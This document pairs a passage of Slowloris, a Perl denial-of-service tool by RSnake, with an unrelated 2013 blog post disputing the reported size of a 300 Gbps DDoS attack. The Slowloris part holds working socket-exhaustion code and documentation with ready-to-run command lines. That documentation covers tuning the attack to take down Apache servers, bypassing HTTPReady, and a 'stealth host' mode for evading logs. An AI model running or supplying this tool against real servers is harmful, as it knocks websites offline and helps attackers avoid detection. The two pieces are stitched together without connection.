              if ($ssl) {
                  if (
                      $sock[$z] = new IO::Socket::SSL(
                          PeerAddr => "$host",
                          PeerPort => "$port",
                          Timeout  => "$tcpto",
                          Proto    => "tcp",
                      )
                    )
                  {
                      $working[$z] = 1;
                  }
                  else {
                      $working[$z] = 0;
                  }
              }
              else {
                  if (
                      $sock[$z] = new IO::Socket::INET(
                          PeerAddr => "$host",
                          PeerPort => "$port",
                          Timeout  => "$tcpto",
                          Proto    => "tcp",
                      )
                    )
                  {
                      $working[$z] = 1;
                      $packetcount = $packetcount + 3;  #SYN, SYN+ACK, ACK
                  }
                  else {
                      $working[$z] = 0;
                  }
              }
              if ( $working[$z] == 1 ) {
                  if ($cache) {
                      $rand = "?" . int( rand(99999999999999) );
                  }
                  else {
                      $rand = "";
                  }
                  my $primarypayload =
                      "$method /$rand HTTP/1.1\r\n"
                    . "Host: $sendhost\r\n"
                    . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                    . "Content-Length: 42\r\n";
                  my $handle = $sock[$z];
                  if ($handle) {
                      print $handle "$primarypayload";
                      if ( $SIG{__WARN__} ) {
                          $working[$z] = 0;
                          close $handle;
                          $failed++;
                          $failedconnections++;
                      }
                      else {
                          $packetcount++;
                          $working[$z] = 1;
                      }
                  }
                  else {
                      $working[$z] = 0;
                      $failed++;
                      $failedconnections++;
                  }
              }
              else {
                  $working[$z] = 0;
                  $failed++;
                  $failedconnections++;
              }
          }
      }
      print "\t\tSending data.\n";
      foreach my $z ( 1 .. $num ) {
          if ( $working[$z] == 1 ) {
              if ( $sock[$z] ) {
                  my $handle = $sock[$z];
                  if ( print $handle "X-a: b\r\n" ) {
                      $working[$z] = 1;
                      $packetcount++;
                  }
                  else {
                      $working[$z] = 0;
                      #debugging info
                      $failed++;
                      $failedconnections++;
                  }
              }
              else {
                  $working[$z] = 0;
                  #debugging info
                  $failed++;
                  $failedconnections++;
              }
          }
      }
      print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
      sleep($timeout);
  }
}
sub domultithreading {
  my ($num) = @_;
  my @thrs;
  my $i                    = 0;
  my $connectionsperthread = 50;
  while ( $i < $num ) {
      $thrs[$i] =
        threads->create( \&doconnections, $connectionsperthread, 1 );
      $i += $connectionsperthread;
  }
  my @threadslist = threads->list();
  while ( $#threadslist > 0 ) {
      $failed = 0;
  }
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service.  It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively.  It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data.  Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts.  There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances.  Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for.  If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows.  For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds.  The following example uses 500 sockets.  Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration.  Some are less than 300.  The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision.  The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful.  Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable.  This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch.  The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development.  Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch.  Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources.  The usefulness of this particular option has not been thoroughly tested.  Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation.  They may be ways around this, but not in this version at this time.  Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be.  Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder).  So it's not invisible if the traffic to the site is typically fairly low.  On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows.  I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number.  If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems.  Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors.  So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another.  You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris?  It's an extremely cute but endangered mammal that happens to also be poisonous.  Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4

The 300 Gbps DDoS Attack?

April 1st, 2013 by Barrett Lyon

On March 19th, CloudFlare reported dealing with a DDoS attack against one of their customers ranging from 10 Gbps to 120 Gbps. They eventually wrote a blog post titled "The DDoS That Almost Broke the Internet." The New York Times wrote an article calling the attack directed at one of CloudFlare's customers "one of the largest computer attacks on the Internet, causing widespread congestion and jamming crucial infrastructure around the world." The Times article states that the attack was around 300 billion bits per second (300 Gbps). Akamai employee Patrick Gilmore then backed the number: "It is a real number," Mr. Gilmore said. "It is the largest publicly announced DDoS attack in the history of the Internet."

Yet CloudFlare never actually saw the 300 Gbps attack; they only saw about 120 Gbps (at the peak) of the advertised Godzilla attack. Where did the other 180 Gbps go? CloudFlare's CEO wrote, "While we don't have direct visibility into the traffic loads they saw, we have been told by one major Tier 1 provider that they saw more than 300Gbps of attack traffic related to this attack. That would make this attack one of the largest ever reported."

Okay, so one of their "Tier 1" providers is reporting 300 Gbps of attack traffic that ended up on its network. Who was that Tier 1 provider? Apparently it was a Tier 2 provider called GTT. Not AT&T, not Level 3, not Tata Communications, but a little-known network called GTT. Richard Steenbergen, GTT's network engineer, wrote an open letter (http://cluepon.net/ras/gizmodo) and stated, "First off I can confirm a few basic facts, namely that we really did receive a ~300 Gbps attack directed at Cloudflare, and later specifically targeted at pieces of our core infrastructure." I know Richard, and he's a smart guy, maybe one of the smartest network guys I know, but he provided no data to back his statement. Reporters need to check facts, don't they?

If I were a betting guy, I would bet that Steenbergen did in fact filter 180 Gbps of traffic on behalf of CloudFlare. That's a good chunk of traffic, but it is by no means insane or the end of the Internet. Large attacks happen all the time, and Tier 1 networks filter huge chunks of traffic constantly. I guess that's why Patrick Gilmore called it the "largest ever reported [attack]".

Very few users would have noticed this attack if it were not for the sensational reporting and poor fact-checking on the part of the New York Times.